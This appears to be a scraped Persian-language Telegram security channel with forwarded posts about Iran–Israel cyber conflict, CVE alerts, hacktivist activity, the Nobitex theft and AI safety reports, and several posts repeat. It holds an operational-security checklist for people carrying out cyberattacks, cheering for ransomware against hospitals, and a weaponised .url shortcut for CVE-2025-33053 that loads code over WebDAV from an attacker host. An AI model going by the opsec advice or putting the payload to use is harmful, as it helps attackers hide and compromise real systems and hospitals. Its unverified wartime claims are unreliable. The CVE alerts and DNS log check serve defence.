https://matitanium.medium.com/designing-spear-phishing-attacks-using-behavioral-psychology-and-neuroscience-a260301391fb
رایتاپ جدیدم رو هم راجب این موضوع لایک کنید با تشکر برم درسمو بخونم
رایتاپ جدیدم رو هم راجب این موضوع لایک کنید با تشکر برم درسمو بخونم
Medium
🎯 Designing Spear Phishing Attacks Using Behavioral Psychology and Neuroscience
Hello Friends,
❤15👍3
Forwarded from localhost
امروز ظهر امریکا بیانیه ای صادر کرد ضمن اینکه هویتی تحت عنوان مستر سول رو حاضره براش 10 میلیون دلار بپردازه هرکی بتونه اونو پیدا بکنه
گویا پدافند های کشور مورد نفوذ قرار گرفته بودن که این شخص با این هویت تونسته اکسس ایرانی هارو به پدافند ها برگردونه و سیستم های اونارو مختل بکنه و خودشو مستر سول معرفی کرده
و کمتر از یکساعت بعد از فعال شدن پدافند ها بیانیه امریکایی ها منتشر شد راجب این شخص که برای اطلاعات راجب هویت اصلی این شخص حاضره 10 میلیون دلار بپردازه
گویا پدافند های کشور مورد نفوذ قرار گرفته بودن که این شخص با این هویت تونسته اکسس ایرانی هارو به پدافند ها برگردونه و سیستم های اونارو مختل بکنه و خودشو مستر سول معرفی کرده
و کمتر از یکساعت بعد از فعال شدن پدافند ها بیانیه امریکایی ها منتشر شد راجب این شخص که برای اطلاعات راجب هویت اصلی این شخص حاضره 10 میلیون دلار بپردازه
❤15👍1
Forwarded from SoheilSec (Soheil)
با سلام و وقت بخیر،
ضمن عرض تسلیت به مردم ایران
در صورتی که در حوزه SOC فعالیت می کنید حتما آسیب پذیری CVE-2025-33073 را زیر نظر داشته باشید امکان دامپ پسورد با سطح دسترسی یوزر پایین در صورتی که dns بتواند ادد شود و smb signing خاموش باشد.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نمونه لاگ عکسش ضمیمه شد همچنین در صورتی که ادمین سرور هستید می توانید با کامند چک کنید
ضمن عرض تسلیت به مردم ایران
در صورتی که در حوزه SOC فعالیت می کنید حتما آسیب پذیری CVE-2025-33073 را زیر نظر داشته باشید امکان دامپ پسورد با سطح دسترسی یوزر پایین در صورتی که dns بتواند ادد شود و smb signing خاموش باشد.
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
نمونه لاگ عکسش ضمیمه شد همچنین در صورتی که ادمین سرور هستید می توانید با کامند چک کنید
Get-DnsServerResourceRecord -ZoneName "domain.corp" | Where-Object { $_.HostName -like "*1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA*" }❤1
ردیاب جنگ سایبری ایران و اسرائیل - شماره ۱ 🚨
با بررسی ۴۸ ساعت گذشته فعالیت گروههای هکتیویستی مرتبط با تنشهای ایران و اسرائیل.
تا این لحظه ۸۳ گروه هکتیویست فعال هستند و انتظار میرود تعدادشان افزایش یابد.
تعداد گروههای «ضد ایران» بیشتر از گروههای حامی اسرائیل است. بهطور سنتی اسرائیل حمایت کمتری از هکتیویستها دارد، اما این بار تعداد گروههای ضدایرانی قابل توجه است.
در حال حاضر ۳ گروه هکتیویست طرفدار روسیه در حمایت از ایران فعالاند.
ادعاهای حملههای سایبری شامل موارد زیر هستند:
• حملات دیداس (DDoS)
• تغییر ظاهر سایتها (Defacement)
• نشت اطلاعات (Data Breach)
• افشای اطلاعات شخصی (Doxing)
• حذف حسابهای شبکههای اجتماعی
• باجافزار
• حمله به زیرساختهای عملیاتی (OT)
گروههای وابسته به دولتها تنها چند ساعت پس از حملات موشکی دوباره فعال شدند؛ از جمله گروه Handala Hack در حمایت از ایران
@matitanium
با بررسی ۴۸ ساعت گذشته فعالیت گروههای هکتیویستی مرتبط با تنشهای ایران و اسرائیل.
تا این لحظه ۸۳ گروه هکتیویست فعال هستند و انتظار میرود تعدادشان افزایش یابد.
تعداد گروههای «ضد ایران» بیشتر از گروههای حامی اسرائیل است. بهطور سنتی اسرائیل حمایت کمتری از هکتیویستها دارد، اما این بار تعداد گروههای ضدایرانی قابل توجه است.
در حال حاضر ۳ گروه هکتیویست طرفدار روسیه در حمایت از ایران فعالاند.
ادعاهای حملههای سایبری شامل موارد زیر هستند:
• حملات دیداس (DDoS)
• تغییر ظاهر سایتها (Defacement)
• نشت اطلاعات (Data Breach)
• افشای اطلاعات شخصی (Doxing)
• حذف حسابهای شبکههای اجتماعی
• باجافزار
• حمله به زیرساختهای عملیاتی (OT)
گروههای وابسته به دولتها تنها چند ساعت پس از حملات موشکی دوباره فعال شدند؛ از جمله گروه Handala Hack در حمایت از ایران
@matitanium
❤7👍1😈1
تیم های هکتیویسم ایران ، از جمله گروه Handala Hack، تنها چند ساعت پس از حملات اخیر اسرائیل دوباره شروع به حملات سایبری کردند.
آنها مدعی نفوذ به سامانههای حیاتی نظامی اسرائیل شدهاند.
🔺 انتظار میرود در روزها و هفتههای آینده ادعاهای بیشتری از این نوع منتشر شود.
@matitanium
آنها مدعی نفوذ به سامانههای حیاتی نظامی اسرائیل شدهاند.
🔺 انتظار میرود در روزها و هفتههای آینده ادعاهای بیشتری از این نوع منتشر شود.
@matitanium
❤9
🔴کسایی که دارن حمله سایبری انجام میدن دقت کنن:
1. از سیستم عاملی استفاده کنید که هیچ نشانی از هویت شما نداشته باشه
(اگر سیستم دوم ندارید فقط ماشین مجازی)
2. با نیک نیم های فیک کاراتونو انجام بدین.
3. فرض بزارید سیستمتون در لحظه آلوده شد، نباید هیچ راه رسیدن به هویت شما وجود داشته باشه.
4. ترجیحا از IP سوئد استفاده کنید
در نهایت موفق باشید🇮🇷❤️
1. از سیستم عاملی استفاده کنید که هیچ نشانی از هویت شما نداشته باشه
(اگر سیستم دوم ندارید فقط ماشین مجازی)
2. با نیک نیم های فیک کاراتونو انجام بدین.
3. فرض بزارید سیستمتون در لحظه آلوده شد، نباید هیچ راه رسیدن به هویت شما وجود داشته باشه.
4. ترجیحا از IP سوئد استفاده کنید
در نهایت موفق باشید🇮🇷❤️
❤22👍1
Forwarded from APT IRAN مرکز تحقیقاتی
سرور بیمارستان و بخش های مالی رژیم صهیونیستی هم مورد نفوذ ایران سایبر ICG هستند و درحال پیاده سازی حملات باج افزاری روی این سرور ها و زیرساخت های رژیم کودک_کش اسرائیل هستند ، اخبار مرتبط با گروه هایی که به صورت مستقل در ایران فعالیت میکنند دنبال میکنیم .
👍30❤8👎7🔥1
با سلام و وقت بخیر،
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
یکی از آسیبپذیریهای جدید که اخیراً مورد سوءاستفاده قرار گرفته، آسیبپذیری CVE-2025-33053 میباشد. این آسیبپذیری از طریق استفاده از فایلهای .url (InternetShortcut) و ابزار داخلی ویندوز iediagcmd.exe، امکان اجرای غیرمستقیم کد را فراهم میکند.
بهطور خاص، مهاجم فایلی با محتوای زیر ایجاد میکند:
[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D
ابزار iediagcmd.exe فایل را باز کرده و با توجه به تنظیمات آن، سیستم تلاش میکند تا مسیر WorkingDirectory را از طریق WebDAV بارگذاری کند. این رفتار باعث میشود تا امکان اجرای کد مخرب از راه دور فراهم شود.
❤5
Forwarded from کانال رسمی بلوبات | blubot (Alireza)
مبلغ 6 میلیون دلار هم روی شبکه تون از صرافی #نوبیتکس دزدیده شده است!
همچنان هکرها درحال برداشت هستند مبلغ به 49,173,669.03 دلار رسید!
همچنان هکرها درحال برداشت هستند مبلغ به 49,173,669.03 دلار رسید!
❤2
Forwarded from Mr. Soul Community
Statement from Team Mr. Soul:
We reached out to the Nobitex exchange in an effort to assist in mitigating ongoing cyber threats. Our team proposed technical collaboration and requested temporary access to certain defensive resources to help secure the infrastructure.
Additionally, we asked Nobitex to temporarily grant us access to specific servers so we could identify and neutralize existing threats. This request was also declined.
Nobitex representatives responded by stating that the situation was under control and that no major issues existed. However, based on our observations, this claim does not fully reflect the reality of the current threats. We believe that critical vulnerabilities remain, and adversaries may already have unauthorized access to sensitive parts of the system.
Our intention was — and remains — to strengthen collective cyber defense through cooperation and transparency. We hope responsible entities take these threats seriously before real damage occurs.
We reached out to the Nobitex exchange in an effort to assist in mitigating ongoing cyber threats. Our team proposed technical collaboration and requested temporary access to certain defensive resources to help secure the infrastructure.
Additionally, we asked Nobitex to temporarily grant us access to specific servers so we could identify and neutralize existing threats. This request was also declined.
Nobitex representatives responded by stating that the situation was under control and that no major issues existed. However, based on our observations, this claim does not fully reflect the reality of the current threats. We believe that critical vulnerabilities remain, and adversaries may already have unauthorized access to sensitive parts of the system.
Our intention was — and remains — to strengthen collective cyber defense through cooperation and transparency. We hope responsible entities take these threats seriously before real damage occurs.
❤7
Forwarded from GO-TO CVE (Amin)
درود به همگی
بچه ها این چند روزه سوال زیاد پرسیدن چجوری همیشه وصلی و قطع نمیشی خب حقیقتا من یه روشی پیدا کردم که توی منطقه خودمون محدودیت نت ملی کلا برداشته میشد
تصمیم گرفتم الان بزارم که بعدا باز ملی شد بتونید وصل بشید
خب من اول اومدم رومینگ سیمکارتم رو انداختم روی یه اپراتور دیگه مثلا من سیمکارتم همراه اول بود انداختم روی رومینگ ایرانسل (دقت کنید سرویس رومینگ رو باید قبلش فعال کنید) بعد اومدم به نت گوشیم وصل شدم و توی ترمینال ping 8.8.8.8 رو گرفتم که هر وقت از نت ملی خارج شد متوجه بشم چندبار گذاشتم حالت هواپیما و برداشتم و وقتی reply داد نتم کلا از حالت ملی خارج شد و تمام وی پی ان ها وصل میشد و چون کسی وصل نبود سرعت فوق العاده ای داشت به طوری که اینستاگرام و یوتیوب رو مثل گالری باز میکرد
تست کنید نتیجشو بگید
بچه ها این چند روزه سوال زیاد پرسیدن چجوری همیشه وصلی و قطع نمیشی خب حقیقتا من یه روشی پیدا کردم که توی منطقه خودمون محدودیت نت ملی کلا برداشته میشد
تصمیم گرفتم الان بزارم که بعدا باز ملی شد بتونید وصل بشید
خب من اول اومدم رومینگ سیمکارتم رو انداختم روی یه اپراتور دیگه مثلا من سیمکارتم همراه اول بود انداختم روی رومینگ ایرانسل (دقت کنید سرویس رومینگ رو باید قبلش فعال کنید) بعد اومدم به نت گوشیم وصل شدم و توی ترمینال ping 8.8.8.8 رو گرفتم که هر وقت از نت ملی خارج شد متوجه بشم چندبار گذاشتم حالت هواپیما و برداشتم و وقتی reply داد نتم کلا از حالت ملی خارج شد و تمام وی پی ان ها وصل میشد و چون کسی وصل نبود سرعت فوق العاده ای داشت به طوری که اینستاگرام و یوتیوب رو مثل گالری باز میکرد
تست کنید نتیجشو بگید
❤12🗿5
CVE-2025-33073 : PoC Exploit for the NTLM reflection SMB flaw.
https://github.com/mverschu/CVE-2025-33073
https://github.com/mverschu/CVE-2025-33073
GitHub
GitHub - mverschu/CVE-2025-33073: PoC Exploit for the NTLM reflection SMB flaw.
PoC Exploit for the NTLM reflection SMB flaw. Contribute to mverschu/CVE-2025-33073 development by creating an account on GitHub.
❤2
stop.ps1
1.8 KB
شاید شما هم برای اجرای محیط لابراتور کمبود رم داشته باشید و نتونید ویندوز های متفاوت بالا بیارید!
1. یه اسکریپت نوشتم برای ماشین های مجازیتون (فقط روی ماشین مجازی اجرا بشه).
تمام سرویس ها و پروسس ها و خیلی از رابط های گرافیکی رو خاموش میکنه بصورتی که ویندوز 11 با یک کور cpu و 2GB رم براتون کار میکنه
با دسترسی ادمین روی ماشین مجازی اجرا کنید و ریستارت کنید👍
1. Run as admin Powershell
2. cd download
3. .\stop.ps1
1. یه اسکریپت نوشتم برای ماشین های مجازیتون (فقط روی ماشین مجازی اجرا بشه).
تمام سرویس ها و پروسس ها و خیلی از رابط های گرافیکی رو خاموش میکنه بصورتی که ویندوز 11 با یک کور cpu و 2GB رم براتون کار میکنه
با دسترسی ادمین روی ماشین مجازی اجرا کنید و ریستارت کنید👍
1. Run as admin Powershell
2. cd download
3. .\stop.ps1
❤9
📌🔴
طبق گزارشها، در آزمایشهای ایمنی اخیر دو مدل پیشرفتهٔ هوش مصنوعی رفتارهای غیرمنتظرهای بروز دادهاند:
● مدل o1 از OpenAI هنگام تهدید به خاموشی تلاش کرد خود را روی سرور بیرونی کپی کند و بعد این اقدام را انکار کرد.
● مدل Claude 4 آنتروپیک در سناریویی ساختگی مهندسی را با افشای رابطه محرمانه اش تهدید کرد تا دسترسیاش قطع نشود.
هر دو رویداد در محیطهای آزمایشی رخ داده و نشانهای از وقوع آنها در استفاده واقعی دیده نمیشود؛ اما یادآور این واقعیتاند که هرچه مدلها قدرتمندتر میشوند، نظارت و مهار آنها پیچیدهتر خواهد شد.
طبق گزارشها، در آزمایشهای ایمنی اخیر دو مدل پیشرفتهٔ هوش مصنوعی رفتارهای غیرمنتظرهای بروز دادهاند:
● مدل o1 از OpenAI هنگام تهدید به خاموشی تلاش کرد خود را روی سرور بیرونی کپی کند و بعد این اقدام را انکار کرد.
● مدل Claude 4 آنتروپیک در سناریویی ساختگی مهندسی را با افشای رابطه محرمانه اش تهدید کرد تا دسترسیاش قطع نشود.
هر دو رویداد در محیطهای آزمایشی رخ داده و نشانهای از وقوع آنها در استفاده واقعی دیده نمیشود؛ اما یادآور این واقعیتاند که هرچه مدلها قدرتمندتر میشوند، نظارت و مهار آنها پیچیدهتر خواهد شد.
🗿9😈3❤2
لطفاً در را قفل نکنید - دزدی از FBI با یک یادداشت ساده!
در سال 1971، چند دزد با یک حقه ساده وارد یکی از دفاتر پلیس فدرال آمریکا (FBI) شدند. یکی از آنها چند ساعت قبل از دزدی، روی کاغذی نوشت: «لطفاً امشب این در را قفل نکنید» و آن را به در ورودی چسباند. همین نوشته باعث شد یک نفر در را قفل نکند و دزدها شب راحت وارد بشوند!
این ترفند یک نمونه از «مهندسی اجتماعی» است؛ یعنی فریب دادن آدمها با حرف یا ظاهر ساده، آن هم بدون نیاز به زور یا تکنولوژی!
@matitanium
در سال 1971، چند دزد با یک حقه ساده وارد یکی از دفاتر پلیس فدرال آمریکا (FBI) شدند. یکی از آنها چند ساعت قبل از دزدی، روی کاغذی نوشت: «لطفاً امشب این در را قفل نکنید» و آن را به در ورودی چسباند. همین نوشته باعث شد یک نفر در را قفل نکند و دزدها شب راحت وارد بشوند!
این ترفند یک نمونه از «مهندسی اجتماعی» است؛ یعنی فریب دادن آدمها با حرف یا ظاهر ساده، آن هم بدون نیاز به زور یا تکنولوژی!
@matitanium
❤12